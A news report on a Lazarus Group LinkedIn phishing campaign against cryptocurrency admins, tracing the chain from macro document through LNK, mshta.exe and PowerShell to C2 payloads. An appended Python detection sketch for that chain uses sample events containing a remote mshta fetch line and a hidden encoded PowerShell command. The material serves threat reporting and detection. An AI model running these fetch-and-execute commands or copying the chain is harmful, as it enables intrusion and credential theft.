The nation-state threat operator Lazarus Group is being tied to a recent phishing campaign that targeted admins at a cryptocurrency firm via LinkedIn messages.

Researchers say that they recently identified a series of incidents that were part of a broader campaign targeting businesses worldwide through LinkedIn messages sent to targets’ personal LinkedIn accounts. The goal of the campaign appears to be financially motivated, with the attackers harvesting credentials necessary for accessing cryptocurrency wallets or online bank accounts.

“Lazarus Group’s activities are a continued threat: the phishing campaign associated with this attack has been observed continuing into 2020, raising the need for awareness and ongoing vigilance amongst organizations operating in the targeted verticals,” said researchers with F-Secure in a Tuesday post.

The attackers targeted system administrators in an unnamed cryptocurrency company with a phishing document, which was attached to a message sent to their personal LinkedIn accounts. The document masqueraded as a legitimate job advertisement for a role in a blockchain technology company, which matched the employee’s skills, researchers said.

Once the target clicked on the malicious document, it claimed to be protected by General Data Protection Regulation (GDPR) restrictions and that the user needed to enable macros in Microsoft Word for further access. Once the target enabled the macros, the malicious embedded macro code would execute.

The macro in the document creates an LNK file that results in the execution of mshta.exe. This then calls out to a “bit.ly” link created in early May 2019, researchers said. Upon further inspection of the link used in the phishing attack, researchers found that it was accessed 73 times from at least 19 countries – including the U.S., China and the UK – leading them to conclude that this is a “widely-targeted lure document.”

The “bit.ly” link then redirects to a domain that executes a VBScript to perform checks on the host and collect further information, which is then sent to a second command-and-control (C2) domain. This eventually leads to the download and execution of a PowerShell script that retrieves a further payload from a third C2, researchers said.
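The execution chain described above (Word macro, LNK file, mshta.exe reaching out to a short link, then PowerShell) leaves a recognisable parent/child process pattern. The following detection sketch is an added example, not code from F-Secure or from the report; it runs over constructed process-creation events in a simplified "parent -> image | command line" format and flags the stages of that chain.

```python
import re

# Constructed sample events (not from the report): "parent_image -> image | command_line".
SAMPLE_EVENTS = """\
explorer.exe -> WINWORD.EXE | "WINWORD.EXE" /n "C:\\Users\\admin\\Downloads\\Blockchain_Engineer_Job.docm"
WINWORD.EXE -> cmd.exe | cmd.exe /c start "" "C:\\Users\\admin\\AppData\\Local\\Temp\\update.lnk"
cmd.exe -> mshta.exe | mshta.exe https://bit.ly/PLACEHOLDER-NOT-REAL
mshta.exe -> powershell.exe | powershell.exe -nop -w hidden -enc ABCD
explorer.exe -> notepad.exe | notepad.exe C:\\notes.txt
svchost.exe -> powershell.exe | powershell.exe -File C:\\Scripts\\backup.ps1
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}

def parse_event(line):
    """Split one constructed event line into (parent, image, cmdline), names lower-cased."""
    parent, rest = line.split(" -> ", 1)
    image, cmdline = rest.split(" | ", 1)
    return parent.strip().lower(), image.strip().lower(), cmdline.strip()

def classify(parent, image, cmdline):
    """Return the reasons an event resembles the macro -> LNK -> mshta -> PowerShell chain."""
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append("office app spawned script host")
    if re.search(r"\.lnk\b", cmdline, re.I) and parent in OFFICE_APPS | {"cmd.exe"}:
        reasons.append("LNK launched from office app or cmd")
    if image == "mshta.exe" and re.search(r"https?://", cmdline, re.I):
        reasons.append("mshta launched with a remote URL")
    if parent == "mshta.exe" and image == "powershell.exe":
        reasons.append("powershell spawned by mshta")
    if image == "powershell.exe" and "-w hidden" in cmdline.lower() \
            and re.search(r"-(enc|e|encodedcommand)\b", cmdline, re.I):
        reasons.append("hidden encoded powershell")
    return reasons

def scan(log_text):
    """Return [(image, reasons)] for every event that matched at least one stage."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            parent, image, cmdline = parse_event(line)
            reasons = classify(parent, image, cmdline)
            if reasons:
                findings.append((image, reasons))
    return findings

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

Correlating the flagged events by process ancestry (Word to cmd to mshta to PowerShell) gives a far stronger signal than any single rule, since the benign scripted backup in the sample is correctly left alone.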